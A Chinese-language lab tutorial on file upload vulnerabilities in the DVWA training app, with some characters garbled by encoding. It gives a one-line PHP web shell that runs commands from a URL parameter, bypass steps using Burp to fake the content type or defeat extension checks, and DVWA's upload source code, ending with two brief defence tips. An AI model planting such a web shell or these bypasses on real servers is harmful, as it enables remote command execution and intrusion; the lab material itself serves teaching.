文件上傳漏洞
<?php
echo shell_exec($_GET['cmd']);
?>
#通過(guò)cmd去執(zhí)行命令
- 將上方的代碼通過(guò)文件上傳的方式上傳到服務(wù)器上,之后進(jìn)行訪問(wèn)
- dvwa中對(duì)文件上傳的內(nèi)容是有過(guò)濾的,只允許100k大小的文件上傳
- 我們可以把截?cái)喙δ艽蜷_
- 然后再次上傳一個(gè)超過(guò)大小的文件
- 我們通過(guò)修改最大文件大小去繞過(guò)這個(gè)限制,即可看到上傳成功
- 上面是低安全等級(jí)的,我們調(diào)到中等安全等級(jí)看下代碼
File Upload Source
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_type = $_FILES['uploaded']['type'];
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '
<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '
<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
else{
echo '
<pre>Your image was not uploaded.</pre>';
}
}
?>
從上面的代碼我們能夠看出來(lái),他對(duì)文件進(jìn)行了大小和類型的判斷;
- 我們的思路就是用bp的截?cái)喙δ苋バ薷恼?qǐng)求的參數(shù),將1.php文件類型改為image/jpeg即可,這里不做詳細(xì)演示了哈
- 再來(lái)看下高安全級(jí)別的dvwa代碼
File Upload Source
<?php
if (isset($_POST['Upload'])) {
$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '
<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
} else {
echo '
<pre>';
echo $target_path . ' succesfully uploaded!';
echo '</pre>';
}
}
else{
echo '
<pre>';
echo 'Your image was not uploaded.';
echo '</pre>';
}
}
?>
- 從代碼上可以看出來(lái),相較于中級(jí)來(lái)說(shuō),這個(gè)是通過(guò)擴(kuò)展名來(lái)判斷文件的類型,我們依然可以通過(guò)截?cái)嗳バ薷?/li>
- 實(shí)際上,現(xiàn)在也有很多對(duì)于文件數(shù)據(jù)的判斷,我們可以把一句話webshell替換掉內(nèi)容方面也可以實(shí)現(xiàn),大家自行嘗試
如何進(jìn)行文件上傳漏洞防護(hù)?
- 首先肯定是要全面對(duì)上傳文件進(jìn)行過(guò)濾
- 其次對(duì)于上傳文件的目錄,要去除所有用戶可執(zhí)行權(quán)限
